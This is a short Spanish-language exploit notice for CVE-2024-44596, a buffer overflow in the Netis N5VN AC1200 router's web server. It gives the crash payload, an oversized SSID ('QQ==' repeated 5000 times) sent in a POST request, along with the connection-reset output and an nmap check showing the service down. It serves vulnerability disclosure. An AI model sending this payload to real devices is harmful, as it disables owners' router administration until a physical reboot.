
Fecha: 05/03/2024
Autor del Exploit: Van Lam Nguyen
Facebook: fb.com/vanlam1412
Página del fabricante: Netis Systems
Versión: Netis N5VN AC1200 V1.0.1.1742
Probado en: Windows
CVE : CVE-2024-44596
Existe una vulnerabilidad de desbordamiento de búfer en el router Netis N5VN AC1200 que puede permitir a un atacante bloquear el servidor web que se ejecuta en el router mediante el envío de una solicitud manipulada.
Para restablecer el http (servidor web), un usuario debe reiniciar físicamente el router.
Solicitud POST para cambiar el ssid de Wireless 2.4G ('ssid': 'QQ==' * 5000)
Con éxito: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http
Mira el vídeo de demostración aquí

